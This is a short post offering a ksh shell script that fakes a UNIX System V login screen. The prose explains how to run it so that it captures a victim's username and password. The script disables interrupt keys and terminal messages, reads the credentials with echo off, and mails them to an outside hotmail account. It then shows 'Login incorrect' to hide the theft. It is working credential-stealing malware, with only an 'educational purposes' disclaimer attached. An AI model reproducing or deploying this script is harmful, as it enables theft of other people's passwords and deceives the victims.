This is a short shell script that captures a user's login password. It does this by spoofing the regular login screen. The user enters their login information at the prompt. Their password is rejected and the script ends, calling the login program, but not before emailing the login and password information to another account. The user then retries their password and everything appears to work as normal.
If you call the file foo, then you would run it by typing "foo;login" on the command line. Note, this needs to be run from a logged-in account.
This script is presented for educational purposes only.
#! /bin/ksh # undefine interrupt key sequences stty intr undef;stty stop undef;stty susp undef;stty dsusp undef # make sure there are no messages written to the terminal mesg n;biff n # create fake login screen clear \echo "\n" \echo "UNIX(r) System V Release 4.0 (`hostname`)\n" \echo "login: \c" read L # turn off echoing so that password is not displayed. stty -echo \echo "Password: \c" read P stty echo # makes the cursor move right after entering the password \echo "\r" # mail to your throwaway hotmail account (or wherever) \echo $L $P | mail [account]@hotmail.com sleep 3 \echo "Login incorrect" #EOF